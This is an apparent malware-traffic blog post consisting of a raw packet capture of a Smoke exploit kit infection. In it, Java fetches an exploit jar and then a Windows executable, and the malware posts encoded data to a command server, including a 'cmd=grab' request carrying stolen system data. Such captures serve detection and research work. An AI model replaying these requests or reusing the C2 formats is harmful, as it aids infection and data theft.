Smoke Exploit Kit EK CONNECT 443 over 8888 Proxy Loads T150 Malware

By | June 19, 2015

2012-09-19 21:36:10.285073 IP 10.37.130.4.49172 > 192.168.186.6.8888: Flags [P.], seq 1:182, ack 1, win 16425, length 181
E…..@…..
%……..”.w…….P.@)….CONNECT javadl-esd-secure.oracle[.]com:443 HTTP/1.0
User-Agent: jupdate
Host: javadl-esd-secure.oracle[.]com:443
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache

2012-09-19 21:36:10.285330 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [.], ack 182, win 16384, length 0
E..(.~….$z….
%..”…….w…P.@..g……..
2012-09-19 21:36:10.535359 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [P.], seq 1:108, ack 182, win 16384, length 107
E………$…..
%..”…….w…P.@.’…HTTP/1.0 200 Connection Established
FiddlerGateway: Direct
StartTime: 03:36:10.858
Connection: close

2012-09-19 21:36:10.585478 IP 10.37.130.4.49172 > 192.168.186.6.8888: Flags [P.], seq 182:314, ack 108, win 16398, length 132
E…..@…..
%……..”.w…… P.@..w……….{..PZs
..<.?........WY..........E.J..../.5... ..... . .2.8.......:........!.....javadl-esd-secure.oracle[.]com. .............. 2012-09-19 21:36:10.585742 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [.], ack 314, win 16384, length 0
E..(……$x….
%..”…… w..HP.@………..
2012-09-19 21:36:10.596367 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [P.], seq 108:1086, ack 314, win 16384, length 978
E……… …..
%..”…… w..HP.@………….M..PZs
M….f.1$..f..w.8n………. .,..o…Ji..}’~……….7….[N./………..t..q..n0..j0……….o.?|..O.J=./.5.R0 ..+……0..1+0)..U…”Created by http://www.fiddler2[.]com1!0…U.
…D.O._.N.O.T._.T.R.U.S.T1907..U…0.D.O._.N.O.T._.T.R.U.S.T._.F.i.d.d.l.e.r.R.o.o.t0…120828220000Z..220828215959Z0w1+0)..U…”Created by http://www.fiddler2[.]com1!0…U.
…D.O._.N.O.T._.T.R.U.S.T1%0#..U….javadl-esd-secure.oracle[.]com0..0.. *.H…………0……….M-…3y,…t./x.E… .r[1..6s..”…%….7…..fw.._^..d….n.M…>T.=k.)…%….D..]:l.B%.L..sW@……]…..1Z./{..z …g………..0..0…U…….0.0…U.%..0
..+…….0….U…..0….YS.}~v…….I…..0..1+0)..U…”Created by http://www.fiddler2[.]com1!0…U.
…D.O._.N.O.T._.T.R.U.S.T1907..U…0.D.O._.N.O.T._.T.R.U.S.T._.F.i.d.d.l.e.r.R.o.o.t…`.l.cX.E]….\.0 ..+……….$…=……,n…!.2.z..V.x.@.y+.Or.o.”……5y..EL^.`……h………3.a…..Dl&..m.P…x.l<.......aQ+.uR....O.$..dp.....S...;...... 2012-09-19 21:36:10.597489 IP 10.37.130.4.49172 > 192.168.186.6.8888: Flags [P.], seq 314:512, ack 1086, win 16153, length 198
E…..@…..
%……..”.w..H….P.?…………….
…..;W..C.Pk.2…e…..h.j.Kx..Q#.%.9…6I.\…..8…..gL…l~.|x.Q…4.,…..c.N……….k.B…J2………O……F.h’?..c………….0C7J.n…+{… ……_X..(.{6..”….&..E….d..I.
2012-09-19 21:36:10.597750 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [.], ack 512, win 16384, length 0
E..(……$v….
%..”…….w…P.@………..
2012-09-19 21:36:10.599188 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [P.], seq 1086:1145, ack 512, win 16384, length 59
E..c……$:….
%..”…….w…P.@..F…………0(vD.joy

2012-09-19 21:39:05.885040 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.58788: 3828 1/0/0 A 67.215.66.132 (52)
`.2K.<............B...................< .5... fe80::21c:42ff:fe00:18.53: 12988+ AAAA? mfodjf393843218.us. (36)
`….,.@…………..< ..........B........5.,..2............mfodjf393843218.us..... 2012-09-19 21:39:06.381332 IP6 fe80::f4f9:fe0f:f7d9:3c09.62130 > fe80::21c:42ff:fe00:18.53: 12988+ AAAA? mfodjf393843218.us. (36)
`….,.@…………..< ..........B........5.,..2............mfodjf393843218.us..... 2012-09-19 21:39:06.535629 IP 10.37.130.1.53 > 10.37.130.4.53546: 3828 1/0/0 A 67.215.66.132 (52)
E..P……..
%..
%…5.*.<...............mfodjf393843218.us.................C.B. 2012-09-19 21:39:06.535667 IP 10.37.130.4 > 10.37.130.1: ICMP 10.37.130.4 udp port 53546 unreachable, length 88
E..l……..
%..
%……….E..P……..
%..
%…5.*.<...............mfodjf393843218.us.................C.B. 2012-09-19 21:39:06.719436 IP6 fe80::89c0:1e6b:523b:4d63.64329 > ff02::1:3.5355: UDP, length 24
`…. ………….kR;Mc……………..I… ..|…………isatap…..
2012-09-19 21:39:06.719438 IP 10.37.130.2.58678 > 224.0.0.252.5355: UDP, length 24
E..4.!….Eu
%…….6… .5|…………isatap…..
2012-09-19 21:39:06.846271 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.62130: 12988 0/0/0 (36)
`….,…………B……………….< .5...,eo2............mfodjf393843218.us..... 2012-09-19 21:39:06.882808 IP 10.37.130.4.49175 > 10.37.130.2.8888: Flags [P.], seq 1:359, ack 1, win 256, length 358
E…..@…..
%..
%….”….3.6..P…….GET http://mfodjf393843218.us/logstat/forum/vida.php?a=2&key=667d2ef8926390c36c735d264e696b64 HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: mfodjf393843218.us
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive

2012-09-19 21:39:06.919456 IP 10.37.130.2.137 > 10.37.130.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N.#…..1
%..
%…….:.X.P………. EJFDEBFEEBFACACACACACACACACACAAA.. ..
2012-09-19 21:39:07.092131 IP 10.37.130.2.8888 > 10.37.130.4.49175: Flags [.], ack 359, win 256, length 0
E..(.%@….Z
%..
%..”….6……P…=… EJFDE
2012-09-19 21:39:07.277823 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.62130: 12988 0/0/0 (36)
`….,…………B……………….< .5...,eo2............mfodjf393843218.us..... 2012-09-19 21:39:07.277862 IP6 fe80::f4f9:fe0f:f7d9:3c09 > fe80::21c:42ff:fe00:18: ICMP6, destination unreachable, unreachable port, fe80::f4f9:fe0f:f7d9:3c09 udp port 62130, length 92
`….\:@…………..< ..........B.......A;....`....,............B...................< .5...,eo2............mfodjf393843218.us..... 2012-09-19 21:39:07.669310 IP 10.37.130.2.137 > 10.37.130.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N.)…..+
%..
%…….:.X.P………. EJFDEBFEEBFACACACACACACACACACAAA.. ..
2012-09-19 21:39:08.419406 IP 10.37.130.2.137 > 10.37.130.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N.+…..)
%..
%…….:.X.P………. EJFDEBFEEBFACACACACACACACACACAAA.. ..
2012-09-19 21:39:09.269770 IP6 fe80::89c0:1e6b:523b:4d63.58073 > ff02::1:3.5355: UDP, length 24
`…. ………….kR;Mc………………… ..T…………isatap…..
2012-09-19 21:39:09.269771 IP 10.37.130.2.56985 > 224.0.0.252.5355: UDP, length 24
E..4.-….Ei
%……….. .
T…………isatap…..
2012-09-19 21:39:09.349571 IP 10.37.130.2.8888 > 10.37.130.4.49175: Flags [P.], seq 1:332, ack 359, win 256, length 331
E..s..@…..
%..
%..”….6……P…….HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Thu, 20 Sep 2012 01:39:03 GMT
Content-Type: application/x-java-archive
Content-Length: 8425
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Last-Modified: Mon, 26 Jul 2001 05:00:00 GMT
ETag: “c81e728d9d4c2f636f067f89cc14862c”
Accept-Ranges: bytes
Vary: User-Agent

2012-09-19 21:39:09.349572 IP 10.37.130.2.8888 > 10.37.130.4.49175: Flags [.], seq 332:1792, ack 359, win 256, length 1460
E…./@…..
%..
%..”….6.,….P….L..PK..
…….3A………… …META-INF/….PK..
…….3A..D………….META-INF/MANIFEST.MFManifest-Version: 1.0
Ant-Version: Apache Ant 1.8.2
Created-By: 1.7.0_03-b05 (Oracle Corporation)
Class-Path:
X-COMMENT: Main-Class will be added automatically by build

PK..
…….3A._UE…….. …App.class…….1.I
…)..*..+.., .-..
2012-09-19 21:39:09.918315 IP 10.37.130.4.49176 > 10.37.130.2.8888: Flags [P.], seq 1:245, ack 1, win 256, length 244
E…..@…..
%..
%….”….#”.EJP…._..GET http://mfodjf393843218.us/logstat/forum/ldr.php?s=java HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: mfodjf393843218.us
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
2012-09-19 21:39:27.598897 IP 10.37.130.2.8888 > 10.37.130.4.49176: Flags [P.], seq 1:277, ack 245, win 256, length 276
E..<.t@..... %.. %.."...".EJ....P....B..HTTP/1.1 200 OK Server: nginx/1.1.14 Date: Thu, 20 Sep 2012 01:39:06 GMT Content-Type: application/octet-stream Content-Length: 98304 Connection: keep-alive X-Powered-By: PHP/5.3.3-7+squeeze13 Accept-Ranges: bytes Content-Disposition: inline; filename=load/129.exe 2012-09-19 21:39:27.598899 IP 10.37.130.2.8888 > 10.37.130.4.49176: Flags [.], seq 277:1737, ack 245, win 256, length 1460
E….u@….V
%..
%..”…”.F^….P…….MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……….q…”…”…”…”…”…”…”h..”…”…”…”…”…”…”…”…”…”Rich…”……..PE..L…..YP……………
.@…0……………P….@………………………………………………………………..]..(………………………………P………………………….\..H…………P………………………….text….<.......@.................. ..`.rdata..@....P... ...P..............@..@.data...| ...p.......p..............@....rsrc...............................@..@............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................. 2012-09-19 21:39:39.130609 IP 10.37.130.4.49177 > 65.55.185.26.80: Flags [P.], seq 1:380, ack 1, win 256, length 379
E….a@…..
%..A7…..PKkf.”.9.P…….GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: windowsupdate.microsoft[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close

2012-09-19 21:39:39.130680 IP 65.55.185.26.80 > 10.37.130.4.49177: Flags [.], ack 380, win 16384, length 0
E..(……..A7..
%…P..”.9.KkhQP.@….. EJFDE
2012-09-19 21:39:39.657997 IP 65.55.185.26.80 > 10.37.130.4.49177: Flags [FP.], seq 1:399, ack 380, win 16384, length 398
E……….’A7..
%…P..”.9.KkhQP.@.`…HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 151
Content-Type: text/html
Location: /windowsupdate/v6/default.aspx
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 20 Sep 2012 01:39:35 GMT
Connection: close

Object moved

Object Moved

This object may be found here.

2012-09-19 21:39:39.658036 IP 10.37.130.4.49177 > 65.55.185.26.80: Flags [.], ack 400, win 255, length 0
E..(.d@…..
%..A7…..PKkhQ”.;ZP…….
2012-09-19 21:39:39.658140 IP 10.37.130.4.49177 > 65.55.185.26.80: Flags [F.], seq 380, ack 400, win 255, length 0
E..(.e@…..
%..A7…..PKkhQ”.;ZP…….
2012-09-19 21:39:39.658267 IP 65.55.185.26.80 > 10.37.130.4.49177: Flags [.], ack 381, win 16384, length 0
E..(……..A7..
%…P..”.;ZKkhRP.@….qTTP/1.
2012-09-19 21:39:39.660317 IP6 fe80::f4f9:fe0f:f7d9:3c09.60020 > fe80::21c:42ff:fe00:18.53: 24186+ A? kotamserv150[.]com. (34)
`….*.@…………..< ..........B......t.5.*Y.^z...........kotamserv150[.]com..... 2012-09-19 21:39:40.650242 IP 10.37.130.4.50213 > 10.37.130.1.53: 24186+ A? kotamserv150[.]com. (34)
E..>.h……
%..
%…%.5.*..^z………..kotamserv150[.]com…..
2012-09-19 21:39:40.702803 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.60020: 24186 1/0/0 A 62.76.188.65 (50)
`….:…………B……………….< .5.t.:.-^z...........kotamserv150[.]com.................>L.A
2012-09-19 21:39:40.703156 IP 10.37.130.4.49178 > 62.76.188.65.80: Flags [S], seq 2385156183, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.i@…..
%..>L.A…P.*.W…… ……………..
2012-09-19 21:39:41.098229 IP 10.37.130.1.53 > 10.37.130.4.50213: 24186 1/0/0 A 62.76.188.65 (50)
E..N……..
%..
%…5.%.:.O^z………..kotamserv150[.]com……………..>L.A
2012-09-19 21:39:41.098266 IP 10.37.130.4 > 10.37.130.1: ICMP 10.37.130.4 udp port 50213 unreachable, length 86
E..j.l……
%..
%……….E..N……..
%..
%…5.%.:.O^z………..kotamserv150[.]com……………..>L.A
2012-09-19 21:39:41.381428 IP 62.76.188.65.80 > 10.37.130.4.49178: Flags [S.], seq 3521870265, ack 2385156184, win 32768, options [mss 1460,wscale 1,nop], length 0
E..0…….n>L.A
%…P….y..*.Xp…J………..
2012-09-19 21:39:41.381470 IP 10.37.130.4.49178 > 62.76.188.65.80: Flags [.], ack 1, win 256, length 0
E..(.n@…..
%..>L.A…P.*.X..y.P…….
2012-09-19 21:39:41.381591 IP 10.37.130.4.49178 > 62.76.188.65.80: Flags [P.], seq 1:485, ack 1, win 256, length 484
E….o@…..
%..>L.A…P.*.X..y.P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 30
Content-Type: application/x-www-form-urlencoded

oA4AAADDzcSdx8XU0MzVx8nO0w==

2012-09-19 21:39:41.381682 IP 62.76.188.65.80 > 10.37.130.4.49178: Flags [.], ack 485, win 16384, length 0
E..(…….u>L.A
%…P….y..*. 10.37.130.4.49178: Flags [P.], seq 1:1368, ack 485, win 16384, length 1367
E………..>L.A
%…P….y..*. 10.37.130.4.49178: Flags [P.], seq 1368:2735, ack 485, win 16384, length 1367
E………..>L.A
2012-09-19 21:40:01.965890 IP 10.37.130.4.49181 > 10.37.130.2.8888: Flags [P.], seq 1:237, ack 1, win 256, length 236
E….(@…..
%..
%….”…{].*9#P….W..CONNECT javadl-esd-secure.oracle[.]com:443 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: javadl-esd-secure.oracle[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive

2012-09-19 21:40:01.983717 IP 62.76.188.65.80 > 10.37.130.4.49180: Flags [S.], seq 1181345330, ack 3317545671, win 32768, options [mss 1460,wscale 1,nop], length 0
E..0……..>L.A
%…P..Fi.2….p……………
2012-09-19 21:40:01.983751 IP 10.37.130.4.49180 > 62.76.188.65.80: Flags [.], ack 1, win 256, length 0
E..(.)@…..
%..>L.A…P….Fi.3P…….
2012-09-19 21:40:01.983849 IP 10.37.130.4.49180 > 62.76.188.65.80: Flags [P.], seq 1:665, ack 1, win 256, length 664
E….*@…..
%..>L.A…P….Fi.3P….i..POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 209
Content-Type: application/x-www-form-urlencoded

cmd=grab&data=PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCldpbmRvd3MgUkFTDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KTmFtZTogSE1BVlBODQpQaG9uZTogMTI3LjAuMC4xDQoNCg==&login=591FB6543608B0F798F1B301B01D752D2E3A315C
2012-09-19 21:40:01.983986 IP 62.76.188.65.80 > 10.37.130.4.49180: Flags [.], ack 665, win 16384, length 0
E..(……. >L.A
%…P..Fi.3…_P.@.x…x.f..8
2012-09-19 21:40:02.160078 IP 10.37.130.2.8888 > 10.37.130.4.49181: Flags [.], ack 237, win 256, length 0
E..( $@….[
%..
%..”….*9#..|IP….:……w.
2012-09-19 21:40:02.855177 IP 10.37.130.4.49179 > 23.5.160.60.443: Flags [S], seq 3032434876, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4./@…..
%…..<......H....... .C............... 2012-09-19 21:40:03.504327 IP 23.5.160.60.443 > 10.37.130.4.49179: Flags [S.], seq 3996787922, ack 3032434877, win 32768, options [mss 1460,wscale 1,nop], length 0
E..0…….c…< %.......:$...H.p....B.......... 2012-09-19 21:40:03.504405 IP 10.37.130.4.49179 > 23.5.160.60.443: Flags [.], ack 1, win 256, length 0
E..(.1@…..
%…..<......H..:$.P...C... 2012-09-19 21:40:03.543814 IP 10.37.130.4.49179 > 23.5.160.60.443: Flags [P.], seq 1:192, ack 1, win 256, length 191
E….2@…..
%…..<......H..:$.P...DD.............PZs.......^q.|.*{ |`V......`Q.....*. .../.....3.2............... ...............c. .4.2............... . .........................................!.....javadl-esd-secure.oracle[.]com 2012-09-19 21:40:03.544031 IP 23.5.160.60.443 > 10.37.130.4.49179: Flags [.], ack 192, win 16384, length 0
E..(…….j…< %.......:$...I|P.@.YI...isata 2012-09-19 21:40:05.136255 IP 62.76.188.65.80 > 10.37.130.4.49180: Flags [P.], seq 1:220, ack 665, win 16384, length 219
E……….B>L.A
%…P..Fi.3…_P.@.*…HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Thu, 20 Sep 2012 01:39:59 GMT
Content-Type: text/html; charset=win-1251
Content-Length: 0
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
2012-09-19 21:40:06.225737 IP 10.37.130.4.49182 > 62.76.188.65.80: Flags [P.], seq 1:560, ack 1, win 256, length 559
E..W.N@…..
%..>L.A…P….4…P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 104
Content-Type: application/x-www-form-urlencoded

hUYAAADm6OG44uDx9urm7vaj6eri7Ou4sLy0w8ezsLG2s7W9x7XDsry9w7THtrW0
x7W0wbKwt8G3wLbEtrSwxqP16vfxuLSxt7Ow

2012-09-19 21:40:06.225809 IP 10.37.130.4.49183 > 62.76.188.65.80: Flags [P.], seq 1:547, ack 1, win 256, length 546
E..J.O@…..
%..>L.A…P%..=J?.$P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 92
Content-Type: application/x-www-form-urlencoded

aDsAAAALBQxVDw0cAAcbHBtOBAcPAQZVXVFZLipeXVxbXlhQKlguX1FQLlkqW1hZ
KlhZLF9dWixaLVspW1ldKw==

2012-09-19 21:40:06.225849 IP 62.76.188.65.80 > 10.37.130.4.49182: Flags [.], ack 560, win 16384, length 0
E..(. ……>L.A
%…P..4…….P.@..9.. EJFDE
2012-09-19 21:40:06.225913 IP 62.76.188.65.80 > 10.37.130.4.49183: Flags [.], ack 547, win 16384, length 0
E..(.
……>L.A
%…P..J?.$%.._P.@….. EJFDE
2012-09-19 21:40:06.227050 IP 10.37.130.4.49184 > 62.76.188.65.80: Flags [P.], seq 1:547, ack 1, win 256, length 546
E..J.P@…..
%..>L.A. .Pw.!.`F./P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 92
Content-Type: application/x-www-form-urlencoded

xDsAAACnqaD5o6Gwt6yhqKjiqKujrar58f31goby8fD38vT8hvSC8/38gvWG9/T1
hvT1gPPx9oD2gfeF9/Xxhw==

Share Button

One thought on “Smoke Exploit Kit EK CONNECT 443 over 8888 Proxy Loads T150 Malware

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

Leave a Reply

Your email address will not be published. Required fields are marked *